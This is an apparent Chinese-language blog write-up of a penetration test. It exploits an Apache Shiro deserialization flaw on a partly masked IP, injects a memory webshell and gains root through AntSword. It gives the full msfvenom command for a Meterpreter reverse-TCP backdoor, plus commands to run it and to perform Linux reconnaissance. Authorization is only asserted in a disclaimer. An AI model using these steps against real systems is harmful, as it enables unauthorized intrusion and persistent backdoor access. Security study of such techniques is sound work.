**说明：**本帖子仅分享安全人员提供安全学习思路或合法授权的安全测试。请不要参考其他用途。如果是这样，你将承担后果。感谢您的关注

**目标：152.xxx.xxx.xxx****目的：通过信息收集或其他方式寻找到了一枚shiro反序列漏洞，内网渗透测试类型：**Web反序列化漏洞

**介绍：**Shiro 是 Java安全框架通过序列化，进行AES身份验证加密密密钥（cookie加密）通过shiro硬编码 比证密钥 获取目标使用链并在线操作！[](https://img-blog.csdnimg.cn/img_convert/630c3a66a8a98bc79566eb0b62ccb82e.png#clientId=u3b1529ff-2511-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=165&id=u1a1f8676&margin=[object Object]&name=image.png&originHeight=206&originWidth=746&originalType=binary&ratio=1&rotation=0&showTitle=false&size=46275&status=done&style=none&taskId=u67250c78-4816-4eb3-a7f0-dc5d798ad53&title=&width=596.8)本文的原因是在一次渗透测试中，挖了一个shiro反序列化 因此，试图进行内网渗透

**特征：**请求信息中 构造cookie添加参数rememberMe=xxx,在响应消息头中观察Set-Cookie是否有rememberMe=deleteMe;若有，则说明使用shiro框架

这里我采用的是网络空间测绘引擎、目录信息收集、域名收集 资产整合利用等

收集的信息 导出整合数据 备用

2. 使用检测工具 减少误判率

我在这里用的是java开发的shiroScan 检测工具*记得在扫描前打开代理 查询当前代理IP

开始在当前目录下扫描目标 再次筛选生存和可用的网站！[](https://img-blog.csdnimg.cn/img_convert/58e25dcaef25aaa1f622728b894824cd.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=542&id=u26d61d48&margin=[object Object]&name=image.png&originHeight=677&originWidth=1520&originalType=binary&ratio=1&rotation=0&showTitle=false&size=391007&status=done&style=none&taskId=ua821a0bd-d65f-4c20-b5d4-14994c0c2d4&title=&width=1216)

导出并保存筛选结果！[](https://img-blog.csdnimg.cn/img_convert/4092f455c6cade2d45bbb209af1859a1.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=665&id=u741f2cdd&margin=[object Object]&name=image.png&originHeight=831&originWidth=1266&originalType=binary&ratio=1&rotation=0&showTitle=false&size=269374&status=done&style=none&taskId=ua3f7d497-2e96-4fe7-850d-443c7a082c7&title=&width=1012.8)

1. 这边我利用shiro用工具对目标进行硬编码 密钥爆破操作

我在这里用的是java开发的shiro在使用工具筛选目标时 发现目标存在Shiro反序列化漏洞 硬编码！[](https://img-blog.csdnimg.cn/img_convert/dc184e47e3187cb960c0fbd8c37834f5.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=138&id=u24881d82&margin=[object Object]&name=image.png&originHeight=172&originWidth=835&originalType=binary&ratio=1&rotation=0&showTitle=false&size=60401&status=done&style=none&taskId=u8ce33b0f-edf3-4432-8875-09a6fdaa8c1&title=&width=668)在工具中使用功能区，爆破后，扫描目标。【记得开代理】kali中 开个小代理！[](https://img-blog.csdnimg.cn/img_convert/9faa69c764c5ad3fcd58653503ed5d2c.png#clientId=u8f720aeb-a6e3-4&crop=0&crop=0&crop=1&crop=1&from=paste∓height=576&id=u623f219b&margin=[object Object]&name=image.png&originHeight=720&originWidth=1280&originalType=binary&ratio=1&rotation=0&showTitle=false&size=295068&status=done&style=none&taskId=u0d2c91a6-93cf-4475-8fe9-3d5a39c28e0&title=&width=1024)2.这边对目标进行目录收集3.这边当即对 目标目录 进行内存马注入操作****拓展一下： 内存马 是无文件渗透测试的一种常用手段webshell的变迁过程大致如下所述：web服务器管理页面——> 大马——>小马拉大马——>一句话木马——>加密一句话木马——>加密内存马因为传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到，故内存马使用越来越多这边我使用 蚁剑 尝试连接成功 在蚁剑的命令行中执行 查询命令时 发现该目标是root用户 Linux系统 初步判断是Debian

这里开始利用 metasploit 安全漏洞检测工具中的_msfvenom payload生成器 _使目标上线

msfvenom生成 Linux 后门程序，这里刚开始我是使用的cobalt strike 中生成的Java后门程序发现行不通 可能是因为目标JDK的版本 导致不兼容的原因，故利用metasploit的msfvenom生成后门程序 结合“蚁剑”上传后门程序 使目标成功进行执行上线操作 msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=[lhost_ip] lport=22715 -f elf -o 123.elf 将生成的后门程序 上传至目标 并利用蚁剑的命令行执行此文件 记得改文件执行权限chmod 777 123.elf;chmod u+x 123.elf;./123.elf 执行文件后门程序“123.elf” 成功上传至目标/bin目录下

执行msfconsole 进入MSF命令接口 执行快速监听等待目标成功上线利用meterpreter成功拿shell它是攻击载荷能够获得目标系统的一个Meterpreter shell的链接

2>/dev/null,作用是丢弃错误信息hostname 2>/dev/null

cat /etc/issue

查询系统和内核的所有相关信息依次为内核名称，主机名，内核版本号，内核版本，硬件架构名称，处理器类型，硬件平台类型，操作系统名称uname -a

cat /proc/cpuinfo

查询文件系统磁盘的详细信息包括磁盘名称，内存大小，已用空间，可用空间，挂载点查看本地磁盘信息df -lh查看所有磁盘信息df -ah

访问网络连接状态及其相关信息的程序这里可以看到在目标执行中的"123.elf"后门程序

点到为止 测试结束

• Shiro反序列化内网上线

• 信息收集

• 漏洞利用

• 目标上线

• 内网渗透 Linux信息收集

• 查询主机名

• 查询系统名称

• 查询内核版本

• 查询CPU信息

• 查询磁盘信息

• 查询网络连接状态

  __EOF__

  -Kio- - 本文链接： https://blog.csdn.net/Webkio/p/16482980.html

• 关于博主： 评论和私信会在第一时间回复。或者直接私信我。
• 版权声明： 本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！
• 声援博主： 如果您觉得文章对您有帮助，可以点击文章右下角**【[推荐](javascript:void(0)😉】**一下。